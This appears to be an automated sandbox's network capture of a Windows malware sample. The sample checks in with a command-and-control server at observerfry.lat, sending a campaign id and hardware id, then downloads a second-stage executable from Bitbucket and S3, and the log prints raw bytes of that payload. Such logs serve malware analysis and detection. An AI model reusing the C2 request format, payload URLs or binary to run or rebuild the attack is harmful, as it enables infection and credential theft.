                                                                                                                                                              2024-12-24 10:22:31 UTC15331OUTData Raw: c0 e8 1a e4 77 18 4b dd ed b7 d7 e6 d5 6d e0 cd 96 a1 77 1e 87 b2 0d b6 24 b0 6a 42 3d 41 7e 92 6c c1 05 51 56 ee 22 85 f7 b5 9c b3 68 25 71 01 a0 55 3d 3f d3 e1 c4 ad af 58 0e 0f 3d b3 c4 d9 e4 72 1a 3e ba 8f 2e 8f f7 a5 87 fc a9 d7 7f 3f 11 d5 61 bc e8 3a 99 b9 f1 09 ac 33 56 05 bb 92 b6 b7 ad 57 ac 0d b9 54 e7 f8 ac 4f 16 87 8d 2a 88 00 5f 66 7d 26 81 6f 6f 76 c8 96 cb 50 f9 a8 e6 f5 99 df 08 c7 80 bb 83 41 5c 69 63 60 54 06 60 97 9b 4f 20 88 c0 b9 3b 28 eb 08 bb f8 0f 5a 08 b1 34 d6 a4 1c 61 ab cc 99 91 a3 42 ac ab 64 de e0 f7 4d e2 07 a7 6d b1 71 8d 49 77 e2 01 92 f3 d6 a9 ba b7 76 f5 bb e7 fc af 54 97 9b 49 46 4b 79 d5 37 1a 1e ce 73 bf 22 10 37 91 60 ef cb cf 41 d7 00 d9 63 70 af 89 8c 12 c3 bd ee fa d6 3e fe ff c5 d8 10 a3 19 41 2f ff fe 19 a2 ec
                                                                                                                                                              Data Ascii: wKmw$jB=A~lQV"h%qU=?X=r>.?a:3VWTO*_f}&oovPA\ic`T`O ;(Z4aBdMmqIwvTIFKy7s"7`Acp>A/
                                                                                                                                                              2024-12-24 10:22:34 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:34 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=gej2odqmu8ctqvrmb32b14k923; expires=Sat, 19 Apr 2025 04:09:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gO%2FUAGkOk0wlUQ83QiQnmDVzRDnx1Djflqmr0Hcg6TSuSPcGXFQaGdJD05ld0a4LTYxXP9jNYGHKR3pP512TUhR3AvoZl6eXgDuj7nOSq%2BPXx1ky4UFf6Wve03KL%2BqZJDc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdee5ffda42eb-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2115&rtt_var=818&sent=326&recv=596&lost=0&retrans=0&sent_bytes=2835&recv_bytes=575071&delivery_rate=1318284&cwnd=211&unsent_bytes=0&cid=f684dea84944fbbd&ts=3716&x=0"


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.649766104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:36 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 88
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:36 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=7CDF789295067FF1BEBA0C6A975F1733
                                                                                                                                                              2024-12-24 10:22:36 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:36 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=qsi5s1ppovla415tg8dk92vth0; expires=Sat, 19 Apr 2025 04:09:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EMLh7r0Q56xyW9xqJipzC0bYmzMsPuvpUCSWhZIw4y9ZXY2cAFrDl6n3M%2FUzo9aqMJIq1YgkRCGbACD9ZmBpybL6CLMdyzDOiegJNOjfQAc%2Bfik7HUQiZ401M8BM7BWHztM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdf05a8e08c15-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1956&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=987&delivery_rate=1452013&cwnd=238&unsent_bytes=0&cid=0c4746635c708058&ts=641&x=0"
                                                                                                                                                              2024-12-24 10:22:36 UTC248INData Raw: 31 31 30 0d 0a 38 31 38 68 67 4d 56 79 67 71 31 66 55 62 5a 34 73 78 56 4d 38 6c 74 47 6b 6c 75 76 69 41 6e 50 64 52 45 4a 58 6f 31 67 56 68 4b 6f 4a 41 50 31 35 30 69 67 78 53 73 6c 78 67 75 4a 53 57 4f 75 64 43 54 37 4c 38 33 39 61 71 51 51 5a 53 63 78 2f 77 63 4b 50 5a 34 6d 54 2b 57 79 42 65 33 66 4e 43 4c 47 47 64 42 77 66 63 42 6f 64 61 4e 70 38 36 64 36 72 42 74 31 56 58 48 70 44 79 46 38 6e 7a 42 41 35 4c 59 75 72 65 73 77 49 39 73 5a 78 32 45 6c 6e 44 77 46 2b 6a 72 64 34 58 32 75 46 33 31 73 63 4f 67 59 4d 7a 44 66 66 55 66 30 35 30 69 79 67 58 30 30 6c 45 4b 43 61 47 43 4a 65 54 4f 77 59 59 33 67 66 62 73 46 4b 31 56 78 30 55 39 6e 4b 73 5a 78 45 37 48 77 58 4c 4f 63 62 48 2b 48 54 75 38 36 49 35 51 39 47 72 30 2f 79 75 34
                                                                                                                                                              Data Ascii: 110818hgMVygq1fUbZ4sxVM8ltGkluviAnPdREJXo1gVhKoJAP150igxSslxguJSWOudCT7L839aqQQZScx/wcKPZ4mT+WyBe3fNCLGGdBwfcBodaNp86d6rBt1VXHpDyF8nzBA5LYureswI9sZx2ElnDwF+jrd4X2uF31scOgYMzDffUf050iygX00lEKCaGCJeTOwYY3gfbsFK1Vx0U9nKsZxE7HwXLOcbH+HTu86I5Q9Gr0/yu4
                                                                                                                                                              2024-12-24 10:22:36 UTC31INData Raw: 6e 71 67 31 30 4b 33 4b 76 42 69 49 77 79 57 38 4e 6f 71 42 51 75 4a 77 69 44 41 3d 3d 0d 0a
                                                                                                                                                              Data Ascii: nqg10K3KvBiIwyW8NoqBQuJwiDA==
                                                                                                                                                              2024-12-24 10:22:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.649773185.166.143.48443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:38 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Host: bitbucket.org
                                                                                                                                                              2024-12-24 10:22:39 UTC5944INHTTP/1.1 302 Found
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:39 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Server: AtlassianEdge
                                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J [TRUNCATED]
                                                                                                                                                              Expires: Tue, 24 Dec 2024 10:22:39 GMT
                                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                              X-Used-Mesh: False
                                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                                              Content-Language: en
                                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                                              X-Served-By: 3f9eeb81cb81
                                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                                              X-Request-Count: 1605
                                                                                                                                                              X-Render-Time: 0.03938484191894531
                                                                                                                                                              X-B3-Traceid: cd09ef5613124c01a4835b8e6982337e
                                                                                                                                                              X-B3-Spanid: da744623b84969fe
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.p [TRUNCATED]
                                                                                                                                                              X-Usage-Quota-Remaining: 999173.500
                                                                                                                                                              X-Usage-Request-Cost: 837.73
                                                                                                                                                              X-Usage-User-Time: 0.025132
                                                                                                                                                              X-Usage-System-Time: 0.000000
                                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                                              Age: 0
                                                                                                                                                              X-Cache: MISS
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                              Atl-Traceid: cd09ef5613124c01a4835b8e6982337e
                                                                                                                                                              Atl-Request-Id: cd09ef56-1312-4c01-a483-5b8e6982337e
                                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                              Server-Timing: atl-edge;dur=148,atl-edge-internal;dur=5,atl-edge-upstream;dur=146,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.2.64978416.182.108.137443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:41 UTC1352OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2 [TRUNCATED]
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                              2024-12-24 10:22:41 UTC554INHTTP/1.1 200 OK
                                                                                                                                                              x-amz-id-2: oSRhGp/z+ioKo8TcXnJxuktNTn/UXCO/CiUlIMFYPft5JjeMc3TpcM6IIDLsOIWufHe/m5E8CRQ=
                                                                                                                                                              x-amz-request-id: K6QAJ3GF39PVY27X
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:42 GMT
                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                              Content-Length: 1325507
                                                                                                                                                              Server: AmazonS3
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-12-24 10:22:41 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                              2024-12-24 10:22:41 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                              Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                              2024-12-24 10:22:41 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                              Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                              2024-12-24 10:22:41 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                              Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                              2024-12-24 10:22:41 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                              Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                              2024-12-24 10:22:41 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                              Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                              2024-12-24 10:22:41 UTC1749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                              Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                              2024-12-24 10:22:41 UTC16384INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                              Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
